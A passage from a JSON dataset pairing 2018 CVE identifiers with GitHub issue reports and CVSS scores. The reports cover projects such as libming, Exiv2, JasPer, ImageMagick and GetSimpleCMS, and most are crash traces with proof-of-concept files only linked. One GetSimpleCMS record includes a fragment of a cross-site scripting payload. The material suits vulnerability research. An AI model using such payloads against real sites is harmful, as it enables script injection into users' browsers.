  33010. "CVE_ID": "CVE-2018-9038",
  33011. "Issue_Url_old": "https://github.com/monstra-cms/monstra/issues/434",
  33012. "Issue_Url_new": "https://github.com/monstra-cms/monstra/issues/434",
  33013. "Repo_new": "monstra-cms/monstra",
  33014. "Issue_Created_At": "2018-03-28T10:57:11Z",
  33015. "description": "Insecure Permissions Vulnerability. Hi, I found another vulnerability. Affected Version NUMBERTAG or before payload FILETAG Steps to replicate: Please see attachment FILETAG Impacts: Monstra CMS NUMBERTAG allows remote attackers to delete files via an PATHTAG request.",
  33016. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
  33017. "severity": "MEDIUM",
  33018. "baseScore": 6.5,
  33019. "impactScore": 3.6,
  33020. "exploitabilityScore": 2.8
  33021. },
  33022. {
  33023. "CVE_ID": "CVE-2018-9039",
  33024. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/4407",
  33025. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/4407",
  33026. "Repo_new": "octopusdeploy/issues",
  33027. "Issue_Created_At": "2018-03-20T23:28:57Z",
  33028. "description": "Deployment Targets visible when scoping APITAG Variable sets for logged in Users whose Team is not scoped to the required Environments. Octopus Version: Tested and replicated in Octopus Version NUMBERTAG Issue: When scoping Project or Library Variables it's possible to specify specific Deployment Targets. In this instance, however, Users are able to view deployment targets and create associated Variables despite the logged in Users Team not being scoped to the appropriate environment. Replication Steps NUMBERTAG Create a new Octopus user with appropriate permissions to edit/view APITAG variable sets NUMBERTAG Create a Team that is scoped to a specific environment (in this example the Testing environment), see below; FILETAG In this example, the Testing environment contains only two deployment targets Offline Package Target and Testing FILETAG NUMBERTAG Login to Octopus as the created User NUMBERTAG Navigate to either the Variables within a Project or Library Set (In this example, this is demonstrating via the Project Variables) and create a new variable, when scoping this variable to a specific target, all targets are viewable not just the two belonging to the associated Team. FILETAG It is then possible to save this change as shown below; FILETAG Source: URLTAG",
  33029. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  33030. "severity": "MEDIUM",
  33031. "baseScore": 6.5,
  33032. "impactScore": 3.6,
  33033. "exploitabilityScore": 2.8
  33034. },
  33035. {
  33036. "CVE_ID": "CVE-2018-9055",
  33037. "Issue_Url_old": "https://github.com/mdadams/jasper/issues/172",
  33038. "Issue_Url_new": "https://github.com/jasper-software/jasper/issues/172",
  33039. "Repo_new": "jasper-software/jasper",
  33040. "Issue_Created_At": "2018-03-27T02:31:54Z",
  33041. "description": "Reachable assertions in jpc_firstone. Description of problem: There is a reachable assertion abort in function jpc_firstone of APITAG that will lead to remote denial of service attack. Version Release number of selected component (if applicable): <= latest version The output information is as follows: CODETAG The gdb debugging information is listed below: ERRORTAG jpc_firstone in jpc_math.c CODETAG Additional info: Credits: pwd MENTIONTAG poc URLTAG",
  33042. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  33043. "severity": "MEDIUM",
  33044. "baseScore": 5.5,
  33045. "impactScore": 3.6,
  33046. "exploitabilityScore": 1.8
  33047. },
  33048. {
  33049. "CVE_ID": "CVE-2018-9132",
  33050. "Issue_Url_old": "https://github.com/libming/libming/issues/133",
  33051. "Issue_Url_new": "https://github.com/libming/libming/issues/133",
  33052. "Repo_new": "libming/libming",
  33053. "Issue_Created_At": "2018-03-29T14:59:42Z",
  33054. "description": "Null pointer dereference in APITAG (decompile.c). On latest version of libming and commit APITAG there is a null pointer dereference in APITAG function of decompile.c file, which could be triggered by the POC below. To reproduce the issue, run ./swftophp $POC The POC is attached NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG c NUMBERTAG bp NUMBERTAG sp NUMBERTAG ffca3ae5e NUMBERTAG T0) APITAG signal is caused by a READ memory access. APITAG address points to the zero page NUMBERTAG c NUMBERTAG in APITAG PATHTAG NUMBERTAG c NUMBERTAG in APITAG PATHTAG NUMBERTAG c NUMBERTAG in APITAG PATHTAG NUMBERTAG a0e4 in APITAG PATHTAG NUMBERTAG a0e4 in APITAG PATHTAG NUMBERTAG b NUMBERTAG in APITAG PATHTAG NUMBERTAG a NUMBERTAG in APITAG PATHTAG NUMBERTAG a NUMBERTAG in main PATHTAG NUMBERTAG fd NUMBERTAG bc2c NUMBERTAG in __libc_start_main ( PATHTAG NUMBERTAG ERRORTAG NUMBERTAG PATHTAG ERRORTAG NUMBERTAG APITAG can not provide additional info. SUMMARY: APITAG SEGV PATHTAG in APITAG NUMBERTAG ABORTING FILETAG",
  33055. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  33056. "severity": "MEDIUM",
  33057. "baseScore": 6.5,
  33058. "impactScore": 3.6,
  33059. "exploitabilityScore": 2.8
  33060. },
  33061. {
  33062. "CVE_ID": "CVE-2018-9135",
  33063. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1009",
  33064. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1009",
  33065. "Repo_new": "imagemagick/imagemagick",
  33066. "Issue_Created_At": "2018-03-02T06:16:43Z",
  33067. "description": "heap buffer overflow . Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG Version: APITAG NUMBERTAG Q NUMBERTAG i NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI Modules APITAG Delegates (built in): bzlib djvu fftw flif fontconfig fpx freetype jbig jng jp2 jpeg lcms ltdl openexr pangocairo png raw tiff webp wmf x xml zlib ASAN OUTPUT APITAG System Configuration APITAG version NUMBERTAG Environment APITAG system, version and so on): ubuntu NUMBERTAG server i NUMBERTAG Additional information: Found by: Wang Yan APITAG",
  33068. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  33069. "severity": "HIGH",
  33070. "baseScore": 8.8,
  33071. "impactScore": 5.9,
  33072. "exploitabilityScore": 2.8
  33073. },
  33074. {
  33075. "CVE_ID": "CVE-2018-9144",
  33076. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/254",
  33077. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/254",
  33078. "Repo_new": "exiv2/exiv2",
  33079. "Issue_Created_At": "2018-03-29T01:30:57Z",
  33080. "description": "Two out of bound read when read tiff file. out of bound read in function APITAG and APITAG the result info with valgrind as follows: the first one NUMBERTAG Memcheck, a memory error detector NUMBERTAG Copyright (C NUMBERTAG and GNU GPL'd, by Julian Seward et al NUMBERTAG Using Valgrind NUMBERTAG and APITAG rerun with h for copyright info NUMBERTAG Command: PATHTAG crashes NUMBERTAG APITAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG B NUMBERTAG APITAG unsigned char const , unsigned long, unsigned int) APITAG NUMBERTAG by NUMBERTAG CC: APITAG std::ostream&, APITAG unsigned int, bool, char, int) APITAG NUMBERTAG by NUMBERTAG E0F: APITAG std::ostream&, APITAG int, unsigned long) APITAG NUMBERTAG by NUMBERTAG CB2FA: APITAG APITAG int) APITAG NUMBERTAG by NUMBERTAG CA NUMBERTAG APITAG APITAG NUMBERTAG by NUMBERTAG CBE8: APITAG APITAG NUMBERTAG by NUMBERTAG C7A6: APITAG const&) APITAG NUMBERTAG by NUMBERTAG E2B6: main APITAG NUMBERTAG Address NUMBERTAG b5ba2 is NUMBERTAG bytes after a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG C2B NUMBERTAG operator APITAG long) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG std::ostream&, APITAG unsigned int, bool, char, int) APITAG NUMBERTAG by NUMBERTAG E0F: APITAG std::ostream&, APITAG int, unsigned long) APITAG NUMBERTAG by NUMBERTAG CB2FA: APITAG APITAG int) APITAG NUMBERTAG by NUMBERTAG CA NUMBERTAG APITAG APITAG NUMBERTAG by NUMBERTAG CBE8: APITAG APITAG NUMBERTAG by NUMBERTAG C7A6: APITAG const&) APITAG NUMBERTAG by NUMBERTAG E2B6: main APITAG NUMBERTAG Process terminating with default action of signal NUMBERTAG SIGSEG NUMBERTAG Access not within mapped region at address NUMBERTAG C9B NUMBERTAG at NUMBERTAG B NUMBERTAG APITAG unsigned char const , unsigned long, unsigned int) APITAG NUMBERTAG by NUMBERTAG CC: APITAG std::ostream&, APITAG unsigned int, bool, char, int) APITAG NUMBERTAG by NUMBERTAG E0F: APITAG std::ostream&, APITAG int, unsigned long) APITAG NUMBERTAG by NUMBERTAG CB2FA: APITAG APITAG int) APITAG NUMBERTAG by NUMBERTAG CA NUMBERTAG APITAG APITAG NUMBERTAG by NUMBERTAG CBE8: APITAG APITAG NUMBERTAG by NUMBERTAG C7A6: APITAG const&) APITAG NUMBERTAG by NUMBERTAG E2B6: main APITAG NUMBERTAG If you believe this happened as a result of a stack NUMBERTAG overflow in your program's main thread (unlikely but NUMBERTAG possible), you can try to increase the size of the NUMBERTAG main thread stack using the main stacksize= flag NUMBERTAG The main thread stack size used in this run was NUMBERTAG HEAP SUMMARY NUMBERTAG in use at exit NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG total heap usage NUMBERTAG allocs NUMBERTAG frees NUMBERTAG bytes allocated NUMBERTAG LEAK SUMMARY NUMBERTAG definitely lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG indirectly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG possibly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG still reachable NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG suppressed NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG Rerun with leak check=full to see details of leaked memory NUMBERTAG For counts of detected and suppressed errors, rerun with NUMBERTAG ERROR SUMMARY NUMBERTAG errors from NUMBERTAG contexts (suppressed NUMBERTAG from NUMBERTAG the second one NUMBERTAG Memcheck, a memory error detector NUMBERTAG Copyright (C NUMBERTAG and GNU GPL'd, by Julian Seward et al NUMBERTAG Using Valgrind NUMBERTAG and APITAG rerun with h for copyright info NUMBERTAG Command: PATHTAG crashes NUMBERTAG APITAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG FE8: APITAG char const , unsigned long, unsigned long) APITAG NUMBERTAG by NUMBERTAG B NUMBERTAG C: APITAG unsigned char const , unsigned long, unsigned int) APITAG NUMBERTAG by NUMBERTAG CC: APITAG std::ostream&, APITAG unsigned int, bool, char, int) APITAG NUMBERTAG by NUMBERTAG E0F: APITAG std::ostream&, APITAG int, unsigned long) APITAG NUMBERTAG by NUMBERTAG CB2FA: APITAG APITAG int) APITAG NUMBERTAG by NUMBERTAG CA NUMBERTAG APITAG APITAG NUMBERTAG by NUMBERTAG CBE8: APITAG APITAG NUMBERTAG by NUMBERTAG C7A6: APITAG const&) APITAG NUMBERTAG by NUMBERTAG E2B6: main APITAG NUMBERTAG Address NUMBERTAG b NUMBERTAG b5 is NUMBERTAG bytes after a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG C2B NUMBERTAG operator APITAG long) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG std::ostream&, APITAG unsigned int, bool, char, int) APITAG NUMBERTAG by NUMBERTAG E0F: APITAG std::ostream&, APITAG int, unsigned long) APITAG NUMBERTAG by NUMBERTAG CB2FA: APITAG APITAG int) APITAG NUMBERTAG by NUMBERTAG CA NUMBERTAG APITAG APITAG NUMBERTAG by NUMBERTAG CBE8: APITAG APITAG NUMBERTAG by NUMBERTAG C7A6: APITAG const&) APITAG NUMBERTAG by NUMBERTAG E2B6: main APITAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG B4B9: APITAG unsigned char const , unsigned long, unsigned int) APITAG NUMBERTAG by NUMBERTAG CC: APITAG std::ostream&, APITAG unsigned int, bool, char, int) APITAG NUMBERTAG by NUMBERTAG E0F: APITAG std::ostream&, APITAG int, unsigned long) APITAG NUMBERTAG by NUMBERTAG CB2FA: APITAG APITAG int) APITAG NUMBERTAG by NUMBERTAG CA NUMBERTAG APITAG APITAG NUMBERTAG by NUMBERTAG CBE8: APITAG APITAG NUMBERTAG by NUMBERTAG C7A6: APITAG const&) APITAG NUMBERTAG by NUMBERTAG E2B6: main APITAG NUMBERTAG Address NUMBERTAG b NUMBERTAG b8 is NUMBERTAG bytes inside a block of size NUMBERTAG free'd NUMBERTAG at NUMBERTAG C2C2BC: operator delete(void ) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG std::char_traits APITAG , std::allocator APITAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG D7BB: APITAG short, unsigned short) APITAG NUMBERTAG by NUMBERTAG B NUMBERTAG APITAG unsigned char const , unsigned long, unsigned int) APITAG NUMBERTAG by NUMBERTAG CC: APITAG std::ostream&, APITAG unsigned int, bool, char, int) APITAG NUMBERTAG by NUMBERTAG E0F: APITAG std::ostream&, APITAG int, unsigned long) APITAG NUMBERTAG by NUMBERTAG CB2FA: APITAG APITAG int) APITAG NUMBERTAG by NUMBERTAG CA NUMBERTAG APITAG APITAG NUMBERTAG by NUMBERTAG CBE8: APITAG APITAG NUMBERTAG by NUMBERTAG C7A6: APITAG const&) APITAG NUMBERTAG by NUMBERTAG E2B6: main APITAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG B NUMBERTAG APITAG unsigned char const , unsigned long, unsigned int) APITAG NUMBERTAG by NUMBERTAG CC: APITAG std::ostream&, APITAG unsigned int, bool, char, int) APITAG NUMBERTAG by NUMBERTAG E0F: APITAG std::ostream&, APITAG int, unsigned long) APITAG NUMBERTAG by NUMBERTAG CB2FA: APITAG APITAG int) APITAG NUMBERTAG by NUMBERTAG CA NUMBERTAG APITAG APITAG NUMBERTAG by NUMBERTAG CBE8: APITAG APITAG NUMBERTAG by NUMBERTAG C7A6: APITAG const&) APITAG NUMBERTAG by NUMBERTAG E2B6: main APITAG NUMBERTAG Address NUMBERTAG b NUMBERTAG is NUMBERTAG bytes after a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG C2B NUMBERTAG operator APITAG long) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG std::ostream&, APITAG unsigned int, bool, char, int) APITAG NUMBERTAG by NUMBERTAG E0F: APITAG std::ostream&, APITAG int, unsigned long) APITAG NUMBERTAG by NUMBERTAG CB2FA: APITAG APITAG int) APITAG NUMBERTAG by NUMBERTAG CA NUMBERTAG APITAG APITAG NUMBERTAG by NUMBERTAG CBE8: APITAG APITAG NUMBERTAG by NUMBERTAG C7A6: APITAG const&) APITAG NUMBERTAG by NUMBERTAG E2B6: main APITAG NUMBERTAG Process terminating with default action of signal NUMBERTAG SIGSEG NUMBERTAG Access not within mapped region at address NUMBERTAG C9B NUMBERTAG at NUMBERTAG B NUMBERTAG APITAG unsigned char const , unsigned long, unsigned int) APITAG NUMBERTAG by NUMBERTAG CC: APITAG std::ostream&, APITAG unsigned int, bool, char, int) APITAG NUMBERTAG by NUMBERTAG E0F: APITAG std::ostream&, APITAG int, unsigned long) APITAG NUMBERTAG by NUMBERTAG CB2FA: APITAG APITAG int) APITAG NUMBERTAG by NUMBERTAG CA NUMBERTAG APITAG APITAG NUMBERTAG by NUMBERTAG CBE8: APITAG APITAG NUMBERTAG by NUMBERTAG C7A6: APITAG const&) APITAG NUMBERTAG by NUMBERTAG E2B6: main APITAG NUMBERTAG If you believe this happened as a result of a stack NUMBERTAG overflow in your program's main thread (unlikely but NUMBERTAG possible), you can try to increase the size of the NUMBERTAG main thread stack using the main stacksize= flag NUMBERTAG The main thread stack size used in this run was NUMBERTAG HEAP SUMMARY NUMBERTAG in use at exit NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG total heap usage NUMBERTAG allocs NUMBERTAG frees NUMBERTAG bytes allocated NUMBERTAG LEAK SUMMARY NUMBERTAG definitely lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG indirectly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG possibly lost NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG still reachable NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG suppressed NUMBERTAG bytes in NUMBERTAG blocks NUMBERTAG Rerun with leak check=full to see details of leaked memory NUMBERTAG For counts of detected and suppressed errors, rerun with NUMBERTAG ERROR SUMMARY NUMBERTAG errors from NUMBERTAG contexts (suppressed NUMBERTAG from NUMBERTAG the pocs please refer to : URLTAG URLTAG",
  33081. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  33082. "severity": "HIGH",
  33083. "baseScore": 8.1,
  33084. "impactScore": 5.2,
  33085. "exploitabilityScore": 2.8
  33086. },
  33087. {
  33088. "CVE_ID": "CVE-2018-9159",
  33089. "Issue_Url_old": "https://github.com/perwendel/spark/issues/981",
  33090. "Issue_Url_new": "https://github.com/perwendel/spark/issues/981",
  33091. "Repo_new": "perwendel/spark",
  33092. "Issue_Created_At": "2018-02-25T05:25:55Z",
  33093. "description": "Where Can I Report Security Vulnerability?. HI, I found a vulnerability and followed the steps URLTAG , and sent mail to people on this page URLTAG . But seems one of these mail addresses are not exists and there are no reply for NUMBERTAG days. Could you check the mail box? Thanks!",
  33094. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  33095. "severity": "MEDIUM",
  33096. "baseScore": 5.3,
  33097. "impactScore": 1.4,
  33098. "exploitabilityScore": 3.9
  33099. },
  33100. {
  33101. "CVE_ID": "CVE-2018-9165",
  33102. "Issue_Url_old": "https://github.com/libming/libming/issues/121",
  33103. "Issue_Url_new": "https://github.com/libming/libming/issues/121",
  33104. "Repo_new": "libming/libming",
  33105. "Issue_Created_At": "2018-03-09T06:35:17Z",
  33106. "description": "Null pointer dereference vulnerability in APITAG APITAG . Hi, i found a null pointer dereference bug in the libming NUMBERTAG It crashed in function APITAG .the details are below(ASAN): ./swftoc NUMBERTAG NULL ptr swf /dev/null .... ... ASAN:SIGSEGV APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG f9aac0d NUMBERTAG bp NUMBERTAG ffe NUMBERTAG d6c3d0 sp NUMBERTAG ffe NUMBERTAG d6bb NUMBERTAG T NUMBERTAG f9aac0d NUMBERTAG in strlen ( PATHTAG NUMBERTAG f9aaccab1a5 in __interceptor_strlen ( PATHTAG NUMBERTAG fd in APITAG PATHTAG NUMBERTAG d NUMBERTAG b in APITAG PATHTAG NUMBERTAG e7ea in APITAG PATHTAG NUMBERTAG eba0 in APITAG PATHTAG NUMBERTAG eccd in APITAG PATHTAG NUMBERTAG c6 in APITAG PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG f3d9 in APITAG PATHTAG NUMBERTAG fb0e in main PATHTAG NUMBERTAG f9aac NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG b NUMBERTAG in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEG NUMBERTAG strlen NUMBERTAG ABORTING POC FILE\uff1a URLTAG",
  33107. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  33108. "severity": "MEDIUM",
  33109. "baseScore": 6.5,
  33110. "impactScore": 3.6,
  33111. "exploitabilityScore": 2.8
  33112. },
  33113. {
  33114. "CVE_ID": "CVE-2018-9173",
  33115. "Issue_Url_old": "https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1266",
  33116. "Issue_Url_new": "https://github.com/getsimplecms/getsimplecms/issues/1266",
  33117. "Repo_new": "getsimplecms/getsimplecms",
  33118. "Issue_Created_At": "2018-03-31T12:07:50Z",
  33119. "description": "Cross Site Scripting Vulnerability in Latest Release NUMBERTAG Hi, I would like to report Cross Site Scripting vulnerability in latest release. Description: Cross site scripting (XSS) vulnerability in uploadify flash file might allow remote attackers to inject arbitrary web script or HTML via the multiple parameters. Steps To Reproduce NUMBERTAG Open below URL in browser which supports flash. URLTAG \"])}catche(e){alert(\"xss\")}// Fix: Update uploadify version. Release Info NUMBERTAG",
  33120. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  33121. "severity": "MEDIUM",
  33122. "baseScore": 6.1,
  33123. "impactScore": 2.7,
  33124. "exploitabilityScore": 2.8
  33125. },
  33126. {
  33127. "CVE_ID": "CVE-2018-9252",
  33128. "Issue_Url_old": "https://github.com/mdadams/jasper/issues/173",
  33129. "Issue_Url_new": "https://github.com/jasper-software/jasper/issues/173",
  33130. "Repo_new": "jasper-software/jasper",
  33131. "Issue_Created_At": "2018-04-03T02:09:01Z",
  33132. "description": "A reachable assertion abort in function jpc_abstorelstepsize. Description of problem: There is a reachable assertion abort in function jpc_abstorelstepsize of APITAG that will lead to remote denial of service attack. Version Release number of selected component (if applicable): APITAG , APITAG \"!((expn NUMBERTAG APITAG PATHTAG line=line APITAG APITAG APITAG \"jpc_abstorelste\"...) at APITAG NUMBERTAG ffff NUMBERTAG c NUMBERTAG in __GI___assert_fail (assertion NUMBERTAG ffff7b NUMBERTAG c NUMBERTAG expn NUMBERTAG file NUMBERTAG ffff7b NUMBERTAG bf0 PATHTAG line NUMBERTAG function NUMBERTAG ffff7b NUMBERTAG c0 APITAG \"jpc_abstorelste\"...) at APITAG NUMBERTAG ffff7b4cc0d in jpc_abstorelstepsize (absdelta NUMBERTAG scaleexpn NUMBERTAG at PATHTAG NUMBERTAG ffff7b NUMBERTAG e in jpc_enc_encodemainhdr (enc NUMBERTAG f NUMBERTAG at PATHTAG NUMBERTAG ffff7b4cdb7 in jpc_encode (image NUMBERTAG out NUMBERTAG d NUMBERTAG optstr NUMBERTAG fffffffc NUMBERTAG n_jp2overhead NUMBERTAG at PATHTAG NUMBERTAG ffff7b3a NUMBERTAG f in jp2_encode (image NUMBERTAG out NUMBERTAG d NUMBERTAG optstr NUMBERTAG at PATHTAG NUMBERTAG ffff7b1fc NUMBERTAG in jas_image_encode (image NUMBERTAG out NUMBERTAG d NUMBERTAG fmt NUMBERTAG optstr NUMBERTAG at PATHTAG NUMBERTAG c in main (argc NUMBERTAG arg NUMBERTAG fffffffdb NUMBERTAG at PATHTAG NUMBERTAG ffff NUMBERTAG b NUMBERTAG in __libc_start_main (main NUMBERTAG c NUMBERTAG APITAG , argc NUMBERTAG arg NUMBERTAG fffffffdb NUMBERTAG init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end NUMBERTAG fffffffdb NUMBERTAG at PATHTAG NUMBERTAG ba9 in _start () APITAG c static uint_fast NUMBERTAG t APITAG absdelta, int scaleexpn) { int p; uint_fast NUMBERTAG t mant; uint_fast NUMBERTAG t expn; int n; if (absdelta APITAG ( n)) : (absdelta << n NUMBERTAG ff; expn = scaleexpn p; if (scaleexpn < p) { APITAG } return JPC_QCX_EXPN(expn) | JPC_QCX_MANT(mant); } ` Additional info: Credits: pwd MENTIONTAG poc URLTAG",
  33133. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  33134. "severity": "MEDIUM",
  33135. "baseScore": 6.5,
  33136. "impactScore": 3.6,
  33137. "exploitabilityScore": 2.8
  33138. },
  33139. {
  33140. "CVE_ID": "CVE-2018-9275",
  33141. "Issue_Url_old": "https://github.com/Yubico/yubico-pam/issues/136",
  33142. "Issue_Url_new": "https://github.com/yubico/yubico-pam/issues/136",
  33143. "Repo_new": "yubico/yubico-pam",
  33144. "Issue_Created_At": "2018-04-02T16:38:28Z",
  33145. "description": "Authfile Leaking File Descriptor . When the authfile is successfully opened, the file descriptor is not closed and leaks file descriptors. The file descriptor should be closed after this line; URLTAG APITAG",
  33146. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H",
  33147. "severity": "HIGH",
  33148. "baseScore": 8.2,
  33149. "impactScore": 4.2,
  33150. "exploitabilityScore": 3.9
  33151. },
  33152. {
  33153. "CVE_ID": "CVE-2018-9304",
  33154. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/262",
  33155. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/262",
  33156. "Repo_new": "exiv2/exiv2",
  33157. "Issue_Created_At": "2018-04-04T08:08:31Z",
  33158. "description": "a div by zero in APITAG A divide by zero occurs in function APITAG the debug info as follows: [ registers ] RA NUMBERTAG ffffffffffffffff RB NUMBERTAG RC NUMBERTAG ffff NUMBERTAG aa3d NUMBERTAG RD NUMBERTAG RSI NUMBERTAG RDI NUMBERTAG a NUMBERTAG ffff7b NUMBERTAG d NUMBERTAG ffff NUMBERTAG a NUMBERTAG APITAG APITAG push rbp) RBP NUMBERTAG fffffffe NUMBERTAG fffffffe NUMBERTAG fffffffe2c NUMBERTAG fffffffe NUMBERTAG fffffffe3b NUMBERTAG RSP NUMBERTAG fffffffe NUMBERTAG a NUMBERTAG ffff7b NUMBERTAG d NUMBERTAG ffff NUMBERTAG a NUMBERTAG APITAG APITAG push rbp) RIP NUMBERTAG ffff NUMBERTAG fc4 APITAG APITAG APITAG uint NUMBERTAG t, int NUMBERTAG div QWORD PTR [rbp NUMBERTAG e8]) R NUMBERTAG R NUMBERTAG ba NUMBERTAG R NUMBERTAG fffffffde NUMBERTAG R NUMBERTAG ffff NUMBERTAG a APITAG APITAG push rbp) R NUMBERTAG c6f8 APITAG const&)>: push rbp) R NUMBERTAG fffffffe NUMBERTAG R NUMBERTAG R NUMBERTAG EFLAGS NUMBERTAG carry parity adjust zero sign trap INTERRUPT direction overflow) [ code NUMBERTAG ffff NUMBERTAG fb4 APITAG APITAG APITAG uint NUMBERTAG t, int NUMBERTAG mov ebx,DWORD PTR [rbp NUMBERTAG ffff NUMBERTAG fba APITAG APITAG APITAG uint NUMBERTAG t, int NUMBERTAG call NUMBERTAG ffff NUMBERTAG APITAG NUMBERTAG ffff NUMBERTAG fbf APITAG APITAG APITAG uint NUMBERTAG t, int NUMBERTAG mov ed NUMBERTAG ffff NUMBERTAG fc4 APITAG APITAG APITAG uint NUMBERTAG t, int NUMBERTAG div QWORD PTR [rbp NUMBERTAG e NUMBERTAG ffff NUMBERTAG fcb APITAG APITAG APITAG uint NUMBERTAG t, int NUMBERTAG cmp rbx,ra NUMBERTAG ffff NUMBERTAG fce APITAG APITAG APITAG uint NUMBERTAG t, int NUMBERTAG seta al NUMBERTAG ffff NUMBERTAG fd1 APITAG APITAG APITAG uint NUMBERTAG t, int NUMBERTAG test al,al NUMBERTAG ffff NUMBERTAG fd3 APITAG APITAG APITAG uint NUMBERTAG t, int NUMBERTAG je NUMBERTAG ffff NUMBERTAG APITAG APITAG APITAG uint NUMBERTAG t, int NUMBERTAG stack NUMBERTAG fffffffe NUMBERTAG a NUMBERTAG ffff7b NUMBERTAG d NUMBERTAG ffff NUMBERTAG a NUMBERTAG APITAG APITAG push rbp NUMBERTAG fffffffe NUMBERTAG ffff7b NUMBERTAG b NUMBERTAG cd NUMBERTAG APITAG push rbp NUMBERTAG fffffffe NUMBERTAG fffffffe NUMBERTAG fffffffe NUMBERTAG ffff NUMBERTAG f NUMBERTAG ffff NUMBERTAG ad NUMBERTAG APITAG mov rax,QWORD PTR [rip NUMBERTAG c NUMBERTAG ffff NUMBERTAG fffffffe NUMBERTAG a NUMBERTAG ffff7b NUMBERTAG d NUMBERTAG ffff NUMBERTAG a NUMBERTAG APITAG APITAG push rbp NUMBERTAG fffffffe0a NUMBERTAG ffffe0d NUMBERTAG fffffffe0a NUMBERTAG Legend: code, data, rodata, value Stopped reason: SIGFPE NUMBERTAG ffff NUMBERTAG fc4 in Exi NUMBERTAG anonymous APITAG (this NUMBERTAG a NUMBERTAG out=..., APITAG dir_offset NUMBERTAG depth NUMBERTAG at APITAG NUMBERTAG if (size > APITAG / count) gdb peda$ p count NUMBERTAG gdb peda$ bt NUMBERTAG ffff NUMBERTAG fc4 in Exi NUMBERTAG anonymous APITAG (this NUMBERTAG a NUMBERTAG out=..., APITAG dir_offset NUMBERTAG depth NUMBERTAG at APITAG NUMBERTAG ffff NUMBERTAG af6 in Exi NUMBERTAG anonymous APITAG (this NUMBERTAG a NUMBERTAG os=..., APITAG depth NUMBERTAG at APITAG NUMBERTAG ca2e in APITAG (this NUMBERTAG out=..., APITAG at APITAG NUMBERTAG c7f9 in APITAG (this NUMBERTAG path=\"crashes NUMBERTAG APITAG NUMBERTAG at APITAG NUMBERTAG e NUMBERTAG in main (argc NUMBERTAG arg NUMBERTAG fffffffe NUMBERTAG at APITAG NUMBERTAG ffff6ce9f NUMBERTAG in __libc_start_main (main NUMBERTAG dfae <main(int, char const )>, argc NUMBERTAG arg NUMBERTAG fffffffe NUMBERTAG init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end NUMBERTAG fffffffe NUMBERTAG at libc APITAG NUMBERTAG dee9 in _start () ============= the poc please refer to : URLTAG",
  33159. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  33160. "severity": "MEDIUM",
  33161. "baseScore": 6.5,
  33162. "impactScore": 3.6,
  33163. "exploitabilityScore": 2.8
  33164. },
  33165. {
  33166. "CVE_ID": "CVE-2018-9846",
  33167. "Issue_Url_old": "https://github.com/roundcube/roundcubemail/issues/6238",
  33168. "Issue_Url_new": "https://github.com/roundcube/roundcubemail/issues/6238",
  33169. "Repo_new": "roundcube/roundcubemail",
  33170. "Issue_Created_At": "2018-04-07T13:29:13Z",
